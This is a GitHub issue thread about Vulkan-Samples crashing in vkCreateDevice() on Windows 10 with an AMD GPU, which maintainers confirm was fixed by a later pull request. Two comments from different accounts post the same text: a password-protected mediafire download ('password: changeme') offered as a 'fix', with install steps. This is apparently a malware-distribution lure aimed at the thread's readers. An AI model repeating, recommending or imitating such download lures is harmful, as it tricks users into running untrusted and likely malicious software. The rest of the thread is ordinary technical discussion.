### ISSUE TITLE
Missing feature checks cause sample crashes on Windows 10 + AMD GPU

### ISSUE THREAD

**Issue by SRSaunders** [KhronosGroup/Vulkan-Samples#1144]
Crashes in `vkCreateDevice()` occur with the following samples when running on Windows 10 with an AMD 6600XT GPU:

1. _dynamic_line_rasterization_
2. _extended_dynamic_state2_
3. _logic_op_dynamic_state_
4. _patch_control_points_

The crashes appear to be due to missing dynamic state and/or line rasterization feature support which is requested by the samples and part of the `VkDeviceCreateInfo` struct.  This seems a bit unexpected, as `vkCreateDevice()` should be able to handle this and instead return a non-success error code.  However, this does not seem to be the case at least for my graphics card/driver.  I am using the most up-to-date AMD drivers and Vulkan SDK 1.3.290.  Windows 10 is also up to date.

~~I will post a PR that first checks for the required features in the above samples and avoids the crashes.~~

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jeroenbakker-atmind** [comment]
I will check if this is still an issue. There has been some improvements in querying the features. Validation if all these issues have been solved needs to be done.

**Comment by SRSaunders** [comment]
I have retested and #1013 fixes this issue for me.  @jeroenbakker-atmind if your tests also pass I will close this issue as complete.  Please let me know.

**Comment by jeroenbakker-atmind** [comment]
Yes it was fixed by the mentioned PR
